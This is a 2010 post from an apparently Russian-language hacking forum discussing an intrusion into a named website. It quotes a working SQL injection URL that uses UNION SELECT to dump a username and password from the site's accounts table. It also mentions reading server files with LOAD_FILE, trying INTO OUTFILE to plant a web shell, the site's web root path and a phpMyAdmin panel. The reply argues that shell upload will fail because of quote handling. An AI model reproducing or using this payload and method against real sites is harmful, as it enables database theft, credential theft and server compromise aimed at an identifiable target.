Показать сообщение отдельно

  #9  
Старый 06.07.2010, 15:09
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
По умолчанию

Цитата:
Сообщение от Gorev  
http://www.grovearcade.com/index.php?page=-6+UNION+SELECT+1,2,3,(SELECT+CONCAT_WS(0x3a,UserNa me,Password)+FROM+grovearcade.accounts+LIMIT+0,1), 5,6,7,8,9,10,11,12--
и заметь что там юзверь под которым крутится БД , root ...читаются файлы на серванте(Load_file ), попробуй еще INTO+OUTFILE может шелл зальешь если путь абсолютный узнаешь
путь /var/www/html
также есть phpmyadmin но с бейсик авторизацией, но так как файлы читаются..остается прочитать нужный файл....
Через эту скулю шелл не зальётся, она ковычки не экранирует.
 
Ответить с цитированием